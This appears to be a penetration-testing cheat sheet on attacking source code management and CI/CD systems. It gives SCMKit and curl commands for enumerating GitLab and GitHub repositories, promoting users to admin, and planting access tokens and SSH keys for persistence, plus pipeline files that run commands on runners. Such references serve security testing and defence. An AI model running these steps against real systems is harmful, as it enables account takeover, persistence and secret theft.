6.8 KiB
Source Code Management & CI/CD Compromise
CI/CD is a method to frequently deliver apps to customers by introducing automation into the stages of app development. The main concepts attributed to CI/CD are continuous integration, continuous delivery, and continuous deployment. Compromises in CI/CD can occur through unauthorized access, misconfiguration, dependency vulnerabilities, insecure secrets, and lack of visibility.
Tools
- synacktiv/nord-stream - List the secrets stored inside CI/CD environments and extract them by deploying malicious pipelines
- xforcered/SCMKit - Source Code Management Attack Toolkit
Enumerate repositories files and secrets
Using SCMKit - Source Code Management Attack Toolkit
- Discover repositories being used in a particular SCM system
SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local
- Search for repositories by repository name in a particular SCM system
SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term" SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"
- Search for code containing a given keyword in a particular SCM system
SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term" SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"
- Search for files in repositories containing a given keyword in the file name in a particular SCM system
SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term" SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"
- List snippets owned by the current user in GitLab
SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local
- List all GitLab runners available to the current user in GitLab
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
- Promote a normal user to an administrative role in a particular SCM system
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
Personal Access Token
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
-
Manual
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
-
Using
SCMKit.exe
: Create/List/Delete an access token to be used in a particular SCM systemSCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
-
Get the assigned privileges to an access token being used in a particular SCM system
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
SSH Keys
- Create/List an SSH key to be used in a particular SCM system
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
Gitlab CI
- Gitlab-CI "Command Execution" example:
.gitlab-ci.yml
stages: - test test: stage: test script: - | whoami parallel: matrix: - RUNNER: VM1 - RUNNER: VM2 - RUNNER: VM3 tags: - ${RUNNER}
Gitlab Executors
- Shell executor: The jobs are run with the permissions of the GitLab Runner’s user and can steal code from other projects that are run on this server.
- Docker executor: Docker can be considered safe when running in non-privileged mode.
- SSH executor: SSH executors are susceptible to MITM attack (man-in-the-middle), because of missing
StrictHostKeyChecking
option.
Gitlab CI/CD variables
CI/CD Variables are a convenient way to store and use data in a CI/CD pipeline, but variables are less secure than secrets management providers
Github Actions
- Github Action "Command Execution" example:
.github/workflows/example.yml
name: example on: workflow_dispatch: push: branches: [ main ] pull_request: branches: [ main ] jobs: build: runs-on: windows-2019 steps: - name: Execute run: | whoami
References
- Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022
- CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023
- Security for self-managed runners - Gitlab
- Fixing Typos and Breaching Microsoft’s Perimeter - John Stawinski IV - April 15, 2024